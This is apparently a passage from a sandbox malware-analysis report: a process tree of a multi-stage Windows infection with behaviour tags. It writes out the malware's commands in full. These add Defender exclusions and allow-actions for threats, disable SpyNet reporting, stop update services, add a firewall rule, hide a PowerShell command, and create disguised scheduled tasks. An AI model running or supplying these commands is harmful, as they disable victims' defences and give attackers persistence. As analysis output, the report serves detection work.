C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
PID:4252 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4076
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:3396
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4152 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵PID:4368
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Launches sc.exe
- Enumerates system info in registry
PID:1048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe7⤵
- Executes dropped EXE
PID:2228 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f8⤵PID:2936
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f8⤵PID:1288
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2240
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Qw369efixtIBKFp9ZFZ0w0mq.exe"C:\Users\Admin\Pictures\Qw369efixtIBKFp9ZFZ0w0mq.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4544
-
-
C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"5⤵PID:4328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:2260
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4236
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:8
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4136
-
-
-
-
C:\Users\Admin\Pictures\mAIqaeuuMoGky7kZVzMJ1DQQ.exe"C:\Users\Admin\Pictures\mAIqaeuuMoGky7kZVzMJ1DQQ.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe"C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exeC:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f848538,0x6f848548,0x6f8485545⤵
- Executes dropped EXE
- Loads dropped DLL
PID:748
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4908
-
-
C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe"C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1204 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231022222438" --session-guid=a91e09c5-c8ae-41cb-bbb5-f2b42ac0f326 --server-tracking-blob=MThmMjM3ZDcxY2RmMjgwYTE3M2NkYjNhMGYyZDljYzE3MTVhNjc5ZGIwOWQ0YWUwYWVhZWYxMDIyMDBiOTA1Mzp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODAxMzQ3NS42Nzk4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxNzM0NGZkMi0yYzJhLTRkMzktOGNkNS0xYjUzYTJhMWVhMDAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=60040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exeC:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6e668538,0x6e668548,0x6e6685546⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4272
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:4480
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x24c,0x250,0x254,0x228,0xac,0xe51588,0xe51598,0xe515a46⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3648
-
-
-
-
C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe"C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe" & exit5⤵PID:4308
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:4124
-
-
-
-
C:\Users\Admin\Pictures\NjD3wZxeeWlSx5eQJUW3XsQg.exe"C:\Users\Admin\Pictures\NjD3wZxeeWlSx5eQJUW3XsQg.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\7zSFA7D.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\7zSFBE4.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:4568
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
- Suspicious use of WriteProcessMemory
PID:1300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUGewEsHO" /SC once /ST 18:34:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:5012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUGewEsHO"7⤵PID:3540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUGewEsHO"7⤵PID:4932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe\" 3Y /WZsite_idDtn 385118 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:320
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4016
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2612
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:5060
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2444
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4236
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4448
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:196
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4908
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵PID:4844
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"2⤵
- Creates scheduled task(s)
PID:4624
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5048
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3972
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4204
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3644
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3264
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4220
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4508
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4624
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2376
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"2⤵
- Creates scheduled task(s)
PID:4076
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4564
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2532
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵PID:592
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵PID:4612
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:4912
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:2716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2700
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2796
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4452
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
- Drops file in Windows directory
PID:320
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe 3Y /WZsite_idDtn 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1748
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:412
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3164
-
-
